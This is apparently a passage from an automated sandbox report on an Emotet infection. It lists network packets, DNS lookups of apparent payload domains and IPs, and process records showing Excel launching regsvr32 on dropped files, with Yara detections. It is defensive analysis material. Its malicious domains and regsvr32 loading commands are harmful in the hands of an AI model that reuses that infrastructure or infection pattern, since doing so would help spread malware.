                            Nov 15, 2022 12:43:50.198852062 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.202442884 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.202486038 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.356827021 CET4917680192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.384488106 CET8049176163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.384563923 CET4917680192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.384752989 CET4917680192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.502834082 CET8049176163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.502966881 CET4917680192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.526437998 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.526488066 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.526627064 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.527003050 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.527031898 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.807878017 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.808072090 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.834065914 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.834100962 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.834559917 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.834657907 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.845236063 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.845251083 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.978935957 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.979039907 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.979135036 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.979163885 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.997932911 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.997978926 CET44349177163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.997992039 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.998038054 CET49177443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.998893976 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.998948097 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:50.999017000 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.999226093 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:50.999237061 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.058146000 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.058315039 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.065999985 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.066024065 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.069143057 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.069154978 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.599956989 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.600119114 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.600148916 CET44349178163.172.108.69192.168.2.22
                            Nov 15, 2022 12:43:51.600219011 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.669475079 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:51.669512987 CET49178443192.168.2.22163.172.108.69
                            Nov 15, 2022 12:43:52.393383980 CET4917980192.168.2.2247.92.133.65
                            Nov 15, 2022 12:43:52.624022007 CET804917947.92.133.65192.168.2.22
                            Nov 15, 2022 12:43:52.624263048 CET4917980192.168.2.2247.92.133.65
                            Nov 15, 2022 12:43:52.624563932 CET4917980192.168.2.2247.92.133.65

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 15, 2022 12:43:46.305713892 CET5586853192.168.2.228.8.8.8
                            Nov 15, 2022 12:43:46.416620970 CET53558688.8.8.8192.168.2.22
                            Nov 15, 2022 12:43:46.418853045 CET137137192.168.2.22192.168.2.255
                            Nov 15, 2022 12:43:47.181888103 CET137137192.168.2.22192.168.2.255
                            Nov 15, 2022 12:43:47.946404934 CET137137192.168.2.22192.168.2.255
                            Nov 15, 2022 12:43:48.869680882 CET4968853192.168.2.228.8.8.8
                            Nov 15, 2022 12:43:48.887279987 CET53496888.8.8.8192.168.2.22
                            Nov 15, 2022 12:43:50.331979990 CET5883653192.168.2.228.8.8.8
                            Nov 15, 2022 12:43:50.349412918 CET53588368.8.8.8192.168.2.22
                            Nov 15, 2022 12:43:52.092000008 CET5013453192.168.2.228.8.8.8
                            Nov 15, 2022 12:43:52.392379045 CET53501348.8.8.8192.168.2.22
                            Nov 15, 2022 12:44:11.827030897 CET138138192.168.2.22192.168.2.255
                            Nov 15, 2022 12:45:41.442714930 CET138138192.168.2.22192.168.2.255

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 15, 2022 12:43:46.305713892 CET192.168.2.228.8.8.80x6626Standard query (0)sat7ate.comA (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:48.869680882 CET192.168.2.228.8.8.80x2474Standard query (0)www.spinbalence.comA (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:50.331979990 CET192.168.2.228.8.8.80x72a1Standard query (0)www.3d-stickers.comA (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:52.092000008 CET192.168.2.228.8.8.80xe22eStandard query (0)navylin.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 15, 2022 12:43:46.416620970 CET8.8.8.8192.168.2.220x6626Server failure (2)sat7ate.comnonenoneA (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:48.887279987 CET8.8.8.8192.168.2.220x2474No error (0)www.spinbalence.com163.172.115.127A (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:50.349412918 CET8.8.8.8192.168.2.220x72a1No error (0)www.3d-stickers.com163.172.108.69A (IP address)IN (0x0001)false
                            Nov 15, 2022 12:43:52.392379045 CET8.8.8.8192.168.2.220xe22eNo error (0)navylin.com47.92.133.65A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • www.spinbalence.com
                            • www.3d-stickers.com
                            • 218.38.121.17
                            • navylin.com

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:43:16
                            Start date:15/11/2022
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Imagebase:0x13fe10000
                            File size:28253536 bytes
                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:4
                            Start time:12:43:27
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:6
                            Start time:12:43:28
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:7
                            Start time:12:43:30
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:8
                            Start time:12:43:33
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Target ID:9
                            Start time:12:43:36
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000009.00000002.1211620382.000000000021A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1212856230.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Target ID:10
                            Start time:12:44:28
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1211836015.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Disassembly

                            No disassembly